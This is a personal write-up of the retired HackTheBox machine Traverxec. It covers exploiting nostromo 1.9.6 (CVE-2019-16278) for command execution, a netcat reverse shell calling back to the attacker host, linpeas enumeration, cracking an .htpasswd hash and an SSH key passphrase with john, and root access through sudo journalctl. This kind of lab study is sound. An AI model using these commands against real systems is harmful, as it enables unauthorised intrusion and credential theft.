Skip to main content




These are my notes for the Traverxec (Retired) Box on HackTheBox.

Credits: S/o to tedd_918, hunterbot for the assist.



  1. enumerating the system thoroughly and methodically is imperative e.g. sudo -l, find -user <username> (for files owned)
  2. learn and document cracking techniques to speed things up e.g. hashcat, ssh2john (new to me)
  3. get better at ssh key vector techniques e.g. how to find keys, crack keys, use keys



run it all: sudo nmap -v -Pn -p- -sC -sV -O --min-rate=5000 -o nmap-traverxec.txt

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
|_http-title: TRAVERXEC
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6

I can see the http-server-header information, and browse the website to also see: nostromo 1.9.6 at Port 80 at the bottom of page.


Use searchsploit to find exploits:

└─$ searchsploit nostromo 1.9.6
--------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------- ---------------------------------
nostromo 1.9.6 - Remote Code Execution | multiple/remote/
--------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Pull it down:

└─$ searchsploit -m 47837      
Exploit: nostromo 1.9.6 - Remote Code Execution
Path: /usr/share/exploitdb/exploits/multiple/remote/
File Type: Python script, ASCII text executable

Copied to: /home/kali/Documents/RxHack/HTB/BOXES/TRAVERXEC/

I go to edit and see:

# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link:
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278

#!/usr/bin/env python

import sys
import socket

art = """

So I Google and find

Test it out, and I can get remote command execution on the target:

└─$ python3 ./
usage: [-h] host port [cmd] error: the following arguments are required: host, port

└─$ python3 ./ 80 whoami
[+] Connecting to target
[+] Sending malicious payload
HTTP/1.1 200 OK
Date: Thu, 24 Mar 2022 09:20:54 GMT
Server: nostromo 1.9.6
Connection: close



reverse shell (netcat)​

We get a bind shell from the target back to our attack host:

└─$ python3 ./ 80 "nc 443 -e /bin/bash"
[+] Connecting to target
[+] Sending malicious payload

Set up our listener, and upgrade our shell once we're in there:

└─$ sudo rlwrap nc -lnvp 443                                                                                   1 β¨―
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 37170
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/usr/bin$


I try these manual find lines first for various vulnerable file types:

#World writable files directories 
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o w -type d 2>/dev/null

# World executable folder
find / -perm -o x -type d 2>/dev/null

# World writable and executable folders

find / \( -perm -o w -perm -o x \) -type d 2>/dev/null
$ find / -perm /4000


From my attack host I do a sudo python3 http.server 80 where my tools are, and then wget it from my reverse shell.

I run

╔══════════╣ SUID - Check easy privesc, exploits and write perms           
strings Not Found
strace Not Found
-rwsr-xr-x 1 root root 427K Oct 6 2019 /usr/lib/openssh/ssh-keysign
-r-sr-xr-x 1 root root 14K Nov 12 2019 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14K Nov 12 2019 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-- 1 root messagebus 50K Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 154K Oct 12 2019 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10

this looks interesting:

╔══════════╣ Analyzing Htpasswd Files (limit 70)                                                                   
-rw-r--r-- 1 root bin 41 Oct 25 2019 /var/nostromo/conf/.htpasswd



Using john the ripper, the rockyou.txt wordlist and the hash copied to my attack host:

RxHackk 福 ~/Repos/RxHack/HTB/BOXES/TRAVERXEC/crack ➀ 431f6ec|main⚑
601 πŸ’€ Β± ➀ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:39 12.80% (ETA: 20:31:49) 0g/s 50608p/s 50608c/s 50608C/s auytun..autsang123
0g 0:00:00:42 13.74% (ETA: 20:31:50) 0g/s 50443p/s 50443c/s 50443C/s AVISALARI..AUGUST6
0g 0:00:03:05 65.97% (ETA: 20:31:25) 0g/s 50083p/s 50083c/s 50083C/s breech89..breeanna91
Nowonly4me (david)
1g 0:00:03:31 DONE (2022-04-05 20:30) 0.004736g/s 50107p/s 50107c/s 50107C/s Noyoudo..November^
Use the "--show" option to display all of the cracked passwords reliably
Session completed

I try su - david and ssh [email protected], but this password doesn't work for those.


review output​

Run linpeas again and see what else I can find:

╔══════════╣ Executing Linux Exploit Suggester                                                                                                                                                                                                
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2019-13272] PTRACE_TRACEME

Exposure: highly probable
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
Download URL:
Comments: Requires an active PolKit agent.

nostromo config files​

So, after few hints from Tedd in chat, I review /var/nostromo/conf/ folder, and in the config file it has this:

# HOMEDIRS [OPTIONAL]                                                                                                 

homedirs /home
homedirs_public public_www

According to nostromo, this means /home/*/public_www is accessible to the www-data user.

public folders​

go here /home/david/public_www

cd /home/david/public_www
index.html protected-file-area
ls -al
ls -al
total 16
drwxr-xr-x 3 david david 4096 Oct 25 2019 .
drwx--x--x 5 david david 4096 Oct 25 2019 ..
-rw-r--r-- 1 david david 402 Oct 25 2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25 2019 protected-file-area
cd protected-file-area
cd protected-file-area
[email protected]:/home/david/public_www/protected-file-area$


ssh keys​

From /home/david/public_www folder we found a backup of the users ssh keys.

Copy *.tgz to /tmp and then untar

tar xvf backup-ssh-identity-files.tgz 
tar xvf backup-ssh-identity-files.tgz

copied id_rsa to local machine, then ssh -i ./id_rsa [email protected]

using the .htpasswd cracked hash doesn't work, so we try to crack the private key itself id_rsa

use ssh2john to convert the id_rsa file to john crackable format: python2 /usr/share/john/ ../keys/id_pub > id_pub.hash

RxHackk 福 ~/Repos/RxHack/HTB/BOXES/TRAVERXEC/crack ➀ 431f6ec|main⚑
697 πŸ’€ Β± ➀ john --wordlist=/usr/share/wordlists/rockyou.txt id_pub.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (../keys/id_pub)
1g 0:00:00:36 DONE (2022-04-05 21:33) 0.02737g/s 392600p/s 392600c/s 392600C/sa6_123..*7Β‘Vamos!
Session completed

re-try ssh, with the cracked .htpasswd passphrase:

708 πŸ’€ Β± ➀ ssh -i ./id_rsa [email protected]
Enter passphrase for key './id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
[email protected]:~$


journalctl less​

There a script in davids ~/bin directory with this command: /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

[email protected]:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2022-04-05 04:25:57 EDT, end at Tue 2022-04-05 06:22:22 EDT. --
Apr 05 04:56:24 traverxec sudo[5475]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 05 04:56:24 traverxec sudo[5475]: www-data : command not allowed ; TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=list
Apr 05 04:56:25 traverxec nologin[5516]: Attempted login by UNKNOWN on UNKNOWN
Apr 05 05:07:22 traverxec su[12115]: pam_unix(su-l:auth): authentication failure; logname= uid=33 euid=0 tty=pts/1 ruser=www-data r
Apr 05 05:07:24 traverxec su[12115]: FAILED SU (to root) www-data on pts/1
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
# cd /root
# ls
nostromo_1.9.6-1.deb root.txt
# cat root.txt